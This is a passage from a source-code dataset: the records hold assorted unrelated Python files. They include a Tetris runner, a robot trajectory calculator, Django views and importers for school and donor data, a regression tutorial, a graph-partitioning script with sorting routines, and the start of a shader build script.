3:\n\t\t\t\tself.aiPlayer.add_opponent_lines(2)\n\t\t\telif p1_line_clears == 4:\n\t\t\t\tself.aiPlayer.add_opponent_lines(4)\n\n\t\tif not self.humanPlayer.is_failed():\n\t\t\tif p2_line_clears == 2:\n\t\t\t\tself.humanPlayer.add_opponent_lines(1)\n\t\t\telif p2_line_clears == 3:\n\t\t\t\tself.humanPlayer.add_opponent_lines(2)\n\t\t\telif p2_line_clears == 4:\n\t\t\t\tself.humanPlayer.add_opponent_lines(4)\n\n\t\t\tself.clock.tick(40)\n\n\tdef play(self):\n\t\twhile True:\n\t\t\twhile not (self.humanPlayer.is_failed() and self.aiPlayer.is_failed()):\n\t\t\t\tself.display_board()\n\t\t\t\tself.get_input()\n\t\t\t\tself.erase_board()\n\t\t\tself.erase_board()\n\t\t\tself.display_board()\n\t\t\tself.display_winner()\n\t\t\tself.wait_for_input()\n\t\t\tself.new_game()\n","sub_path":"runners/vs_ai_runner.py","file_name":"vs_ai_runner.py","file_ext":"py","file_size_in_byte":7828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"414117815","text":"import csv\nfrom math import cos, sin, radians\ninput_file=\"wheelData.csv\"\nanglist = []\ndistlist=[]\nxlist=[]\nylist=[]\nprevx=0\nprevy=0\ntotangle=0\nwith open(input_file,\"rb\") as pos_input:\n\tcsv_reader = csv.reader(pos_input)\n\tcsv_reader.next()\n\tfor row in csv_reader:\n angle=float(row[0])\n #print angle\n distance=float(row[1])\n #print distance\n anglist.append(angle)\n distlist.append(distance)\n\n\nfor i in range(len(distlist)):\n ang=anglist[i]\n dist=distlist[i]\n ang = -ang\n tempx=dist*(sin(radians(ang)))\n tempy=dist*cos(radians(ang)) \n #print str(tempx) + \" \" + str(tempy)\n x=tempx*cos(radians(totangle))+tempy*sin(radians(totangle))\n y=-tempx*sin(radians(totangle))+tempy*cos(radians(totangle))\n x = x + prevx\n y = y + prevy\n totangle = totangle - ang\n prevx = x\n prevy = y\n #print (\"Total Angle: \", totangle)\n xlist.append(y)\n ylist.append(x)\n #print \"X: \",x\n #print \"Y: \",y\n\nfilehandle=open(\"generatedXY.csv\",\"w\")\nwriter = csv.writer(filehandle)\nwriter.writerow([\"x\",\"y\"])\nfor i in range(len(xlist)):\n x=xlist[i]\n y=ylist[i]\n writer.writerow([x,y])\nfilehandle.close() \n'''\n if(totangle>360):\n totangle=totangle-360\n if(totangle>=0 and totangle<90):\n x=x\n y=y\n if(totangle==90):\n x=prevx+x\n y=prevyy\n if(totangle>90 and totangle<180):\n x=prevx-x\n y=prevy+y\n if(totangle==180):\n x=x\n y=prevy-y\n if(totangle>180 and totangle<270):\n x=prevx+x\n y=prevy+y\n if(totangle==270):\n x=prevx-x\n y=y\n if(totangle>270 and totangle<360):\n x=prevx-x\n y=prevy+y\n \n prevx=x\n prevy=y\n''' \n \n \n","sub_path":"ROS_Robot_Trajectory_Planning_and_Navigation/trajectory_pkg/scriptrs/generatepoints.py","file_name":"generatepoints.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"372376307","text":"\r\n\r\nimport pipa\r\nfrom pipa import PipelineItem\r\n\r\nclass MakeItem(PipelineItem):\r\n def __init__(self, *args, **kwargs):\r\n super(MakeItem, self).__init__(*args, **kwargs)\r\n self.name = 'make_item'\r\n\r\n def generator(self, input_list, func=None, func_kwargs={}):\r\n for input in input_list:\r\n item = func(input, **func_kwargs)\r\n self.logger.debug(item)\r\n yield item","sub_path":"pipa/util/item/make_item.py","file_name":"make_item.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"529839224","text":"import configparser\nimport os.path\nimport tkinter as tk\n\nclass Config(object):\n global general_setting, style_setting, style\n def __init__(self):\n global general_settings\n settings_path = \"settings/settings.ini\"\n settings_exists = os.path.exists(settings_path)\n if settings_exists == True:\n\n print(\"Файл конфигуряции основных настроек найден\")\n general_settings = configparser.ConfigParser() # создаём объекта парсера\n general_settings.read(settings_path) # читаем конфиг\n general_setting(self)\n style(self)\n Window()\n else:\n print(\"Проверьте существование файла\")\n\n def style(self):\n global style_settings\n style_path = \"settings/style.ini\"\n style_exists = os.path.exists(style_path)\n if style_exists == True:\n print(\"Файл конфигуряции настроек стиля найден\")\n style_settings = configparser.ConfigParser()\n style_settings.read(style_path)\n style_setting(self)\n else:\n print(\"Проверьте существование файла\")\n\n\n def general_setting(self):\n global Debug, Height, Width\n Debug = general_settings[\"General\"][\"Debug\"]\n Height = general_settings[\"General\"][\"Height\"]\n Width = general_settings[\"General\"][\"Width\"]\n print(Debug, Height, Width)\n\n def style_setting(self):\n global Foreground_main, Background_main, Height_main, Width_main\n Foreground_main = style_settings[\"Label\"][\"Foreground_main\"]\n Background_main = style_settings[\"Label\"][\"Background_main\"]\n Height_main = style_settings[\"Label\"][\"Height_main\"]\n Width_main = style_settings[\"Label\"][\"Width_main\"]\n print(Foreground_main, Background_main)\n\nclass Window(Config):\n global text\n ##Основное окно\n def __init__(self):\n window_main = tk.Tk()\n text(self)\n window_main.mainloop()\n\n ##Текст\n def text(self):\n label = tk.Label(text=\"Python рулит!\",\n foreground=Foreground_main,\n background=Background_main,\n height=Height_main,\n width=Width_main\n )\n\n label.pack()\n\nConfig()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"212750469","text":"\"\"\"\nAssorted Functions.\n\"\"\"\n\nimport skilstak.colors as c\n\ndef go(clear):\n if clear == 0:\n print(c.clear)\n elif clear == 1:\n print()\n print()\n print()\n truefalse = \"*/*';*d*ad*\"\n\n while truefalse == \"*/*';*d*ad*\":\n truefalse = input(c.blue + 'press any key to continue ' + c.magenta)\n\n print(c.green + 'ok!' + c.reset)\n print(c.clear)\n \ndef space(nums):\n num = 0\n while num <= nums:\n print()\n num = num + 1\n\n'''\ndef err:\n\n\n'''\n\n'''\ndef question(sentence, question, ans1, ans2, ans3, cAns, pts) :\n questionCorrect = 0\n numWrong = 0\n\n while questionCorrect == 0:\n print(c.green + sentence)\n print()\n print(c.red + question)\n print()\n print(c.red + 'A: ' + c.yellow + ans1)\n print(c.red + 'B: ' + c.yellow + ans2)\n print(c.red + 'C: ' + c.yellow + ans3)\n print()\n answer = input(c.blue + 'Select the letter: ').strip().lower()\n\n if answer == cAns:\n print(c.green + 'CORRECT!')\n questionCorrect = 1\n pts +=\n else:\n print(c.green + 'Not quite, try again...')\n\n go(0)\n\n'''\n\n\n\n\n","sub_path":"systems.py","file_name":"systems.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"28086316","text":"from connection import Connection\r\nimport timeit\r\nimport sys\r\nimport threading\r\n\r\n\r\n\r\ndef main():\r\n inp = input(\"Enter your command:\\n\")\r\n time = {}\r\n\r\n start = timeit.default_timer()\r\n sort_func = inp.split()[1]\r\n path = inp.split()[2]\r\n p = path\r\n path = \"./\" + path\r\n file = open(path)\r\n text_input = file.read()\r\n file.close()\r\n txt_list = []\r\n t = text_input.split(\"\\n\")\r\n for row in t:\r\n txt_list.append(row.split())\r\n\r\n vertex_pair = []\r\n for element in txt_list:\r\n vertex_pair.append([int(element[0]), int(element[1])])\r\n\r\n length = vertex_pair[len(vertex_pair) - 1][0] + 1\r\n neighbor_list = [[] for _ in range(length)]\r\n\r\n for edge in vertex_pair:\r\n neighbor_list[edge[0]].append(edge[1])\r\n # print(neighbor_list[1], neighbor_list[44])\r\n\r\n stop = timeit.default_timer()\r\n time.update({\"Read file and create neighbor-list time\": start - stop})\r\n\r\n conn = Connection(length, neighbor_list)\r\n start = timeit.default_timer()\r\n cij_dict = initially_score_calculator(neighbor_list)\r\n stop = timeit.default_timer()\r\n time.update({\"Calculating initial scores time\": start - stop})\r\n sys.setrecursionlimit(10 ** 9)\r\n partitioned_graph = graph_union(cij_dict, neighbor_list, conn, sort_func)\r\n f = open(\"result-\" + p, \"w\")\r\n for i in range(1, len(partitioned_graph)):\r\n if partitioned_graph[i]:\r\n f.write(str(i) + \"\\t\" + \"A\\n\")\r\n else:\r\n f.write(str(i) + \"\\t\" + \"B\\n\")\r\n f.close()\r\n\r\n print(time)\r\n\r\n\r\ndef initially_score_calculator(neighbor_list):\r\n c_ij = {}\r\n for i_vertex in range(1, len(neighbor_list)):\r\n for j_vertex in neighbor_list[i_vertex]:\r\n if ([i_vertex, j_vertex] not in list(c_ij.keys())) and \\\r\n ([j_vertex, i_vertex] not in list(c_ij.keys())):\r\n k_i = len(neighbor_list[i_vertex])\r\n k_j = len(neighbor_list[j_vertex])\r\n min_k = min(k_i - 1, k_j - 1)\r\n if min_k == 0:\r\n score = float('inf')\r\n else:\r\n score = (zij(i_vertex, j_vertex, neighbor_list) + 1) / min(k_i - 1, k_j - 1)\r\n c_ij.update({(i_vertex, j_vertex): score})\r\n # print(\"{}-{}: \".format(i_vertex, j_vertex), score)\r\n return c_ij\r\n\r\n\r\n# def zij(neighbor_list):\r\n# z_dict = {}\r\n# for i_vertex in range(1, len(neighbor_list)):\r\n# for j_vertex in neighbor_list[i_vertex]:\r\n# if (str(i_vertex) + \"-\" + str(j_vertex) not in list(z_dict.keys())) and \\\r\n# (str(j_vertex) + \"-\" + str(i_vertex) not in list(z_dict.keys())):\r\n# tmp_list = [value for value in neighbor_list[i_vertex] if value in neighbor_list[j_vertex]]\r\n# z_dict.update({str(i_vertex) + \"-\" + str(j_vertex): len(tmp_list)})\r\n# return z_dict\r\n\r\n\r\ndef zij(i_vertex, j_vertex, neighbor_list):\r\n z_dict = {}\r\n # if (str(i_vertex) + \"-\" + str(j_vertex) not in list(z_dict.keys())) and \\\r\n # (str(j_vertex) + \"-\" + str(i_vertex) not in list(z_dict.keys())):\r\n tmp_list = [value for value in neighbor_list[i_vertex] if value in neighbor_list[j_vertex]]\r\n # z_dict.update({str(i_vertex) + \"-\" + str(j_vertex): len(tmp_list)})\r\n\r\n return len(tmp_list)\r\n\r\n\r\ndef graph_union(cij_dict, neighbor_list, conn, sort_func):\r\n if sort_func == \"Bubble\":\r\n sorted_values = bubbleSort(list(cij_dict.values()))\r\n elif sort_func == \"Quick \":\r\n lst = list(cij_dict.values())\r\n sorted_values = quick_sort(lst, 0, len(lst) - 1)\r\n elif sort_func == \"Merge\":\r\n sorted_values = mergeSort(list(cij_dict.values()))\r\n elif sort_func == \"Insertion\":\r\n sorted_values = insertion_sort(list(cij_dict.values()))\r\n\r\n key_min = get_key(sorted_values[0], cij_dict)\r\n cij_dict.pop(key_min)\r\n i_vertex, j_vertex = key_min[0], key_min[1]\r\n f, partitioned_graph = conn.is_bridge(i_vertex, j_vertex)\r\n print(key_min)\r\n if f:\r\n if j_vertex in neighbor_list[i_vertex]:\r\n neighbor_list[i_vertex].remove(j_vertex)\r\n if i_vertex in neighbor_list[j_vertex]:\r\n neighbor_list[j_vertex].remove(i_vertex)\r\n partitioned_graph[j_vertex] = False\r\n return partitioned_graph\r\n\r\n if j_vertex in neighbor_list[i_vertex]:\r\n neighbor_list[i_vertex].remove(j_vertex)\r\n if i_vertex in neighbor_list[j_vertex]:\r\n neighbor_list[j_vertex].remove(i_vertex)\r\n\r\n for vertex in neighbor_list:\r\n if (i_vertex in vertex) or (j_vertex in vertex):\r\n pass\r\n for key in list(cij_dict.keys()):\r\n if (i_vertex in key) or (j_vertex in key):\r\n k_i = len(neighbor_list[key[0]])\r\n k_j = len(neighbor_list[key[1]])\r\n min_k = min(k_i - 1, k_j - 1)\r\n if min_k == 0:\r\n score = float('inf')\r\n else:\r\n score = (zij(i_vertex=key[0], j_vertex=key[1], neighbor_list=neighbor_list) + 1) / min(k_i - 1, k_j - 1)\r\n cij_dict[key] = score\r\n graph_union(cij_dict, neighbor_list, conn, sort_func)\r\n\r\n\r\ndef get_key(val, dic):\r\n for key, value in dic.items():\r\n if val == value:\r\n return key\r\n\r\n return \"key doesn't exist\"\r\n\r\n\r\ndef bubbleSort(arr):\r\n n = len(arr)\r\n\r\n # Traverse through all array elements\r\n for i in range(n - 1):\r\n # range(n) also work but outer loop will repeat one time more than needed.\r\n\r\n # Last i elements are already in place\r\n for j in range(0, n - i - 1):\r\n\r\n # traverse the array from 0 to n-i-1\r\n # Swap if the element found is greater\r\n # than the next element\r\n if arr[j] > arr[j + 1]:\r\n arr[j], arr[j + 1] = arr[j + 1], arr[j]\r\n return arr\r\n\r\n\r\ndef insertion_sort(array):\r\n for index in range(1, len(array)):\r\n currentValue = array[index]\r\n currentPosition = index\r\n\r\n while currentPosition > 0 and array[currentPosition - 1] > currentValue:\r\n array[currentPosition] = array[currentPosition - 1]\r\n currentPosition = currentPosition - 1\r\n\r\n array[currentPosition] = currentValue\r\n return array\r\n\r\n\r\ndef partition(array, start, end):\r\n pivot = array[start]\r\n low = start + 1\r\n high = end\r\n\r\n while True:\r\n while low <= high and array[high] >= pivot:\r\n high = high - 1\r\n\r\n # Opposite process of the one above\r\n while low <= high and array[low] <= pivot:\r\n low = low + 1\r\n\r\n if low <= high:\r\n array[low], array[high] = array[high], array[low]\r\n # The loop continues\r\n else:\r\n # We exit out of the loop\r\n break\r\n\r\n array[start], array[high] = array[high], array[start]\r\n\r\n return high\r\n\r\n\r\ndef quick_sort(array, start, end):\r\n if start >= end:\r\n return array\r\n\r\n p = partition(array, start, end)\r\n quick_sort(array, start, p - 1)\r\n quick_sort(array, p + 1, end)\r\n\r\n\r\ndef dfs(v, visited, neighbor_list, i, j):\r\n if v == i:\r\n return \"A\"\r\n elif v == j:\r\n return \"B\"\r\n # Mark the current node as\r\n # visited and print it\r\n visited[v] = True\r\n\r\n # Recur for all the vertices\r\n # adjacent to this vertex\r\n i = 0\r\n while i != len(neighbor_list[v]):\r\n if (not visited[neighbor_list[v][i]]):\r\n dfs(neighbor_list[v][i], visited)\r\n i += 1\r\n\r\n\r\n# Python program for implementation of MergeSort\r\ndef mergeSort(arr):\r\n if len(arr) > 1:\r\n\r\n # Finding the mid of the array\r\n mid = len(arr) // 2\r\n\r\n # Dividing the array elements\r\n L = arr[:mid]\r\n\r\n # into 2 halves\r\n R = arr[mid:]\r\n\r\n # Sorting the first half\r\n mergeSort(L)\r\n\r\n # Sorting the second half\r\n mergeSort(R)\r\n\r\n i = j = k = 0\r\n\r\n # Copy data to temp arrays L[] and R[]\r\n while i < len(L) and j < len(R):\r\n if L[i] < R[j]:\r\n arr[k] = L[i]\r\n i += 1\r\n else:\r\n arr[k] = R[j]\r\n j += 1\r\n k += 1\r\n\r\n # Checking if any element was left\r\n while i < len(L):\r\n arr[k] = L[i]\r\n i += 1\r\n k += 1\r\n\r\n while j < len(R):\r\n arr[k] = R[j]\r\n j += 1\r\n k += 1\r\n return arr\r\n\r\n\r\nif __name__ == '__main__':\r\n sys.setrecursionlimit(10 ** 9)\r\n threading.Thread(target=main).start()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"497193662","text":"from ..models import *\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nimport json\n\ndef getAdminPage(request):\n cities = City.objects.all()\n types = Type.objects.all()\n stations = BusStation.objects.all()\n\n context = {'cities': cities, 'types': types, 'stations': stations}\n return render(request, 'stationsAdminPage.html', context)\n\ndef addStation(request):\n station = BusStation()\n station.name = request.POST['name']\n station.direction = request.POST['direction']\n station.city = City.objects.get(id = request.POST['cityId'])\n station.save()\n return JsonResponse({'id':station.id})\n\ndef addRoute(request):\n bus = Bus()\n bus.number = request.POST['number']\n bus.name = request.POST['routeName']\n bus.type = Type.objects.get(id = request.POST['typeId'])\n bus.city = City.objects.get(id = request.POST['cityId'])\n\n bus.save() \n stations = json.loads(request.POST['stations'])\n print(stations)\n prev_st = None\n for index, station in enumerate(stations):\n route = Route()\n route.bus = bus\n if index != 0:\n route.current_station = BusStation.objects.get(id = prev_st['id'])\n route.next_station = BusStation.objects.get(id = station['id']) \n prev_st = station\n route.save()\n route = Route()\n route.bus = bus\n route.current_station = BusStation.objects.get(id = prev_st['id'])\n route.save()\n return JsonResponse({'status':'SUCCESS'})\n\n \n \n \n\n","sub_path":"buses/handlers/stationsAdminService.py","file_name":"stationsAdminService.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"353449741","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('catalog', '0003_auto_20160112_1951'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='product',\n name='quantity',\n field=models.IntegerField(default=0, verbose_name=b'\\xd0\\x9a\\xd0\\xbe\\xd0\\xbb\\xd0\\xb8\\xd1\\x87\\xd0\\xb5\\xd1\\x81\\xd1\\x82\\xd0\\xb2\\xd0\\xbe \\xd0\\xbd\\xd0\\xb0 \\xd1\\x81\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd0\\xb5'),\n ),\n ]\n","sub_path":"catalog/migrations/0004_product_quantity.py","file_name":"0004_product_quantity.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"622900210","text":"# Simple Linear Regression\n# Is based on the formula y = b0 + b1*x\n# y = Dependent variable (something you are trying to understand on how it depends on\n# something else)\n# x = Independent variable (causing the dependent variable to change or having an implied\n# association with the dependent variable)\n# b1 = coefficient (how the IV changes)\n# b0 = constant\n\n# y_^i = modeled value of DI y_i (the value that is on the modeled regression line)\n# Linear Regression: min(sum(y_i - y_^i)^2)\n\n# Multiple Linear Regression\n# y = b0 + b1*x1 + b2*x2 + ... + bn*xn\n\n# To handle categorical variables (i.e. State) we need to create dummy variables\n# For every single categorical value we need to create a separate column for each,\n# populating it with 1/0 values\n\n# Whenever building a model, always omit one dummy variable, no matter how many variables\n# there are in the set\n# If there are multiple dummy variable sets, apply this to each set\n\n# Importing the library\n\nimport numpy as np\n# Plot graphics\nimport matplotlib.pyplot as plt\n# Import and manage datasets\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('50_Startups.csv')\n\n# Creating the matrix of features\n# We take values of all the columns except the last one\nx = dataset.iloc[:,:-1].values\nprint(x)\n\n# Creating the depending variable vector\ny = dataset.iloc[:, 4].values\nprint(y)\n\n\n# Encoding categorical data\n# Encoding the independent variables\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabel_encoder_x = LabelEncoder()\n# We encode the states (column 4)\nx[:, 3] = label_encoder_x.fit_transform(x[:, 3])\n# We change the text to numbers\none_hot_encoder = OneHotEncoder(categorical_features=[3])\nx = one_hot_encoder.fit_transform(x).toarray()\nprint(x)\n\n\n# Avoiding the dummy variable trap - we exclude the first column\nx = x[:, 1:]\nprint(x)\n\n\n# Splitting dataset into Training set and Test set\n# We need a dataset to train the model and one to test it against\nfrom sklearn.cross_validation import train_test_split\n# test/train size is portion of the dataset to included in test/train split\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=0)\n\n\n# Fitting Multiple Linear Regression to the Training Set\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(x_train, y_train)\n\n\n# Predicting the test results\ny_pred = regressor.predict(x_test)\nprint(y_pred)\n\n\n# Building the optimal model using Backward Elimination\nimport statsmodels.formula.api as sm\n# When doing the Multiple Linear Regression above, the fact that x0=1 so that x0*b0 is\n# included in the regression was already done by the api\n# Here we need to add this ourselves\n# We add a column with 1 to X (actually we create a matrix with 50 rows of int 1 and then\n# add the X matrix to that)\nx = np.append(arr=np.ones((50, 1)).astype(int), values=x, axis=1)\nprint(x)\n\n# First thing to do for Backwards Elimination is to create the Optimal Matrix of Features\n# which contains only the high impact independent variables\nx_opt = x[:, [0, 1, 2, 3, 4, 5]] # x_opt initialized with all 6 columns\n# We create a new regressor since this time we are using the sm library instead of\n# linear_model\nregressor_ols = sm.OLS(y, exog=x_opt).fit()\n\n# Next we look for the predictor with the highest p value (Step 3 in Backwards Elimination)\nprint(regressor_ols.summary())\n\n# We remove the columns with highest p value - column 2 0.99\nx_opt = x[:, [0, 1, 3, 4, 5]]\nregressor_ols = sm.OLS(endog=y, exog=x_opt).fit()\nregressor_ols.summary()\n\n# We remove the columns with highest p value - column 1 0.94\nx_opt = x[:, [0, 3, 4, 5]]\nregressor_ols = sm.OLS(endog=y, exog=x_opt).fit()\nregressor_ols.summary()\n\n# We remove the columns with highest p value - column 2 0.602\nx_opt = x[:, [0, 3, 5]]\nregressor_ols = sm.OLS(endog=y, exog=x_opt).fit()\nregressor_ols.summary()\n\n# We remove the columns with highest p value - column 2 0.06\nx_opt = x[:, [0, 3]]\nregressor_ols = sm.OLS(endog=y, exog=x_opt).fit()\nregressor_ols.summary()\n\n","sub_path":"machine learning/01 Regression/02multiple_linear_regression.py","file_name":"02multiple_linear_regression.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"552577326","text":"# Create your views here.\nimport datetime\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.template.loader import render_to_string\nfrom django.utils import simplejson\nfrom models import School,District,AYPDetail,AYPSummary\n\n\ndef display_ayp( request ):\n if \"district\" not in request.GET:\n district = \"SPRINGFIELD R-XII\"\n else:\n district = request.GET[\"district\"]\n\n districts = District.objects.filter( active = True ).order_by('name')\n\n return render_to_response( 'schools/ayp.html', { 'districts': districts, 'district': district }, context_instance = RequestContext( request ) )\n\ndef get_schools( request ):\n if \"school_type\" not in request.GET:\n school_type = \"high\"\n else:\n school_type = request.GET[\"school_type\"]\n\n if \"district\" not in request.GET:\n district = \"SPRINGFIELD R-XII\"\n else:\n district = request.GET[\"district\"]\n schools = School.objects.filter( district = District.objects.get( name= district ) ).order_by( 'school_type','name' )\n districts = District.objects.filter( active = True ).order_by('name')\n return render_to_response( 'schools/school_detail.html', {'schools': schools, 'district': district, 'districts': districts, 'school_name': schools[0].name }, context_instance = RequestContext( request ) )\n\ndef get_school_ayp_xml( request, district = None, school = None ):\n if district is None:\n district = \"SPRINGFIELD R-XII\"\n if school is None:\n if \"school\" not in request.GET:\n schools = School.objects.filter( district = District.objects.get( name = district ) )\n school = schools[0].name\n else:\n school = request.GET[\"school\"]\n school = School.objects.get( name = school, district = District.objects.get( name = district ) )\n details = AYPDetail.objects.filter( school = school ).order_by( \"year\" )\n\n chart_string = \"\"\n #chart_string += \"ETA6GP4F771O.945CWK-2XOI1X0-7L\"\n chart_string += \"line\"\n chart_string += \"\"\n chart_string += \"\"\n chart_string += \"\"\n chart_string += \"2006\"\n chart_string += \"2007\"\n chart_string += \"2008\"\n chart_string += \"2009\"\n chart_string += \"2010\"\n chart_string += \"2011\"\n chart_string += \"\"\n\n #communication arts\n chart_string += \"\"\n chart_string += \"Communication Arts\"\n for detail in details:\n chart_string += \"%f\" % ( \"Communication Arts\", detail.comm_school_total )\n chart_string += \"\"\n \n #math\n chart_string += \"\"\n chart_string += \"Mathematics\"\n for detail in details:\n chart_string += \"%f\" % ( \"Mathematics\", detail.math_school_total )\n chart_string += \"\"\n \n #attendance\n chart_string += \"\"\n chart_string += \"Attendance\"\n for detail in details:\n chart_string += \"%f\" % (\"Attendance\", detail.attendance_pct )\n chart_string += \"\"\n \n if school.school_type == \"high\":\n #graduation\n chart_string += \"\"\n chart_string += \"Graduation\"\n for detail in details:\n chart_string += \"%f\" % (\"Graduation\", detail.graduation_pct )\n chart_string += \"\"\n chart_string += \"\"\n chart_string += \"%s\" % str(school).title()\n chart_string += \"\"\n chart_string += \"\"\"\"\"\"\n chart_string += \"\"\n chart_string += \"\"\"\"\"\"\n chart_string += \"\"\n chart_string += \"\"\n\n return HttpResponse( chart_string, content_type=\"application/xml\" )\n\ndef ayp_xml( request, school_type = None, district = None ):\n chart_string = \"\"\n #chart_string += \"ETA6GP4F771O.945CWK-2XOI1X0-7L\"\n chart_string += \"line\"\n chart_string += \"\"\n chart_string += \"\"\n chart_string += \"\"\n chart_string += \"2006\"\n chart_string += \"2007\"\n chart_string += \"2008\"\n chart_string += \"2009\"\n chart_string += \"2010\"\n chart_string += \"2011\"\n chart_string += \"\"\n #now our data\n if \"school_type\" in request.GET and request.GET[\"school_type\"]:\n schl_type = request.GET[\"school_type\"]\n else:\n schl_type = \"high\"\n if district is None:\n if \"district\" in request.GET:\n schools = School.objects.filter( district = District.objects.filter( name = request.GET[\"district\"].upper() ), active=True, school_type=schl_type )\n else:\n schools = School.objects.filter( district = District.objects.filter( name = \"SPRINGFIELD R-XII\" ), active= True, school_type=schl_type )\n else:\n schools = School.objects.all( school_type= \"high\", active= True )\n for school in schools:\n details = AYPDetail.objects.filter( school = school ).order_by( 'year' )\n chart_string += \"\"\n chart_string += \"%s\" % school.name\n for detail in details:\n if \"display_type\" in request.GET and request.GET[\"display_type\"]:\n if request.GET[\"display_type\"] == \"comm_arts\":\n if detail.comm_school_total is None:\n detail.comm_school_total = 0\n chart_string += \"%f\" % ( str( school.name ).title(), detail.comm_school_total )\n elif request.GET[\"display_type\"] == \"math\":\n if detail.math_school_total is None:\n detail.math_school_total = 0\n chart_string += \"%f\" % ( str( school.name ).title(), detail.math_school_total )\n elif request.GET[\"display_type\"] == \"attendance\":\n if detail.attendance_pct is None:\n detail.attendance_pct = 0\n chart_string += \"%f\" % ( str( school.name ).title(), detail.attendance_pct )\n elif request.GET[\"display_type\"] == \"graduation\":\n if detail.graduation_pct is None:\n detail.graduation_pct = 0\n chart_string += \"%f\" % ( str( school.name ).title(), detail.graduation_pct )\n else:\n #default to comm_arts\n chart_string += \"%f\" % ( str( school.name ).title(), detail.comm_school_total )\n chart_string += \"\"\n #error code to make sure that something is shown\n if details is None or len( details ) == 0:\n chart_string +=\"No Data\"\n chart_string +=\"0\"; #2006\n chart_string +=\"0\"; #2007\n chart_string +=\"0\"; #2008\n chart_string +=\"0\"; #2009\n chart_string +=\"0\"; #2010\n chart_string +=\"0\"; #2011\n chart_string +=\"\"\n if \"display_type\" in request.GET:\n if request.GET[\"display_type\"] == \"comm_arts\":\n chart_lbl = \"Communication Arts\"\n elif request.GET[\"display_type\"] == \"math\":\n chart_lbl = \"Mathematics\"\n elif request.GET[\"display_type\"] == \"attendance\":\n chart_lbl = \"Attendance\"\n elif request.GET[\"display_type\"] == \"graduation\":\n chart_lbl = \"Graduation\"\n else:\n chart_lbl = \"Communication Arts\"\n #error code to make sure something is shown\n if schools is None or len( schools ) == 0:\n chart_string +=\"No School Found\"\n chart_string +=\"0\"; #2006\n chart_string +=\"0\"; #2007\n chart_string +=\"0\"; #2008\n chart_string +=\"0\"; #2009\n chart_string +=\"0\"; #2010\n chart_string +=\"0\"; #2011\n chart_string +=\"\"\n\n chart_string += \"\"\n chart_string += \"%s\" % chart_lbl\n chart_string += \"\"\n chart_string += \"\"\"\"\"\"\n chart_string += \"\"\n chart_string += \"\"\"\"\"\"\n chart_string += \"\"\n chart_string += \"\"\n return HttpResponse( chart_string, content_type='application/xml' )\n","sub_path":"schools/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"109305139","text":"from django.core.management.base import BaseCommand, CommandError\nimport csv\nfrom students.models import Student\nfrom schools.models import School\nfrom classes.models import Class\nfrom donors.models import Donor, Donor_log\nimport datetime \n\n\nclass Command(BaseCommand):\n\n\tdef add_arguments(self, parser):\n\t\tparser.add_argument('csv_file', nargs='+', type=str)\n\n\tdef handle(self, *args, **options):\n\t\tfor csv_file in options['csv_file']:\n\t\t\tdataReader = csv.reader(open(csv_file), delimiter=',', quotechar='\"')\n\t\t\tfor row in dataReader:\n\t\t\t\tdon = Donor_log()\n\t\t\t\t\n\t\t\t\tdon_name = Donor.objects.get(reg=row[0]) #first get school name\n\t\t\t\tdon.contact_name = don_name\n\t\t\t\tdon.donation_date = datetime.datetime.strptime(row[1], '%m/%d/%Y').date()\n\t\t\t\tdon.fiscal_year = row[2]\n\t\t\t\tdon.currency = row[3]\n\t\t\t\tdon.amount_local_currency = row[4]\n\t\t\t\tdon.conversion_rate_if_not_PKR = row[5]\n\t\t\t\tdon.amount_pkr = row[6]\n\t\t\t\tdon.donation_notes = row[7]\n\t\t\t\tdon.save()\n\t\t\t\tself.stdout.write(\n\t\t\t\t\t'Created donation {} {}'.format(don.contact_name, don.donation_date)\n\t\t\t\t)","sub_path":"src/donors/management/commands/import_donations.py","file_name":"import_donations.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"390348839","text":"# compiles_shaders.py\n#\n# runs shaders in shaders/raw through shaderc to produce\n# compiled shaders\n\nimport sys, os\nfrom os.path import join, isfile\n\ndx11cmd_fs = \"shadercRelease -f {} -o {} --type f -i common\\ --platform windows -p ps_4_0 -O 3\"\ndx11cmd_vs = \"shadercRelease -f {} -o {} --type v -i common\\ --platform windows -p vs_4_0 -O 3\"\n\ndx9cmd_fs = \"shadercRelease -f {} -o {} --type f -i common\\ --platform windows -p ps_3_0 -O 3\"\ndx9cmd_vs = \"shadercRelease -f {} -o {} --type v 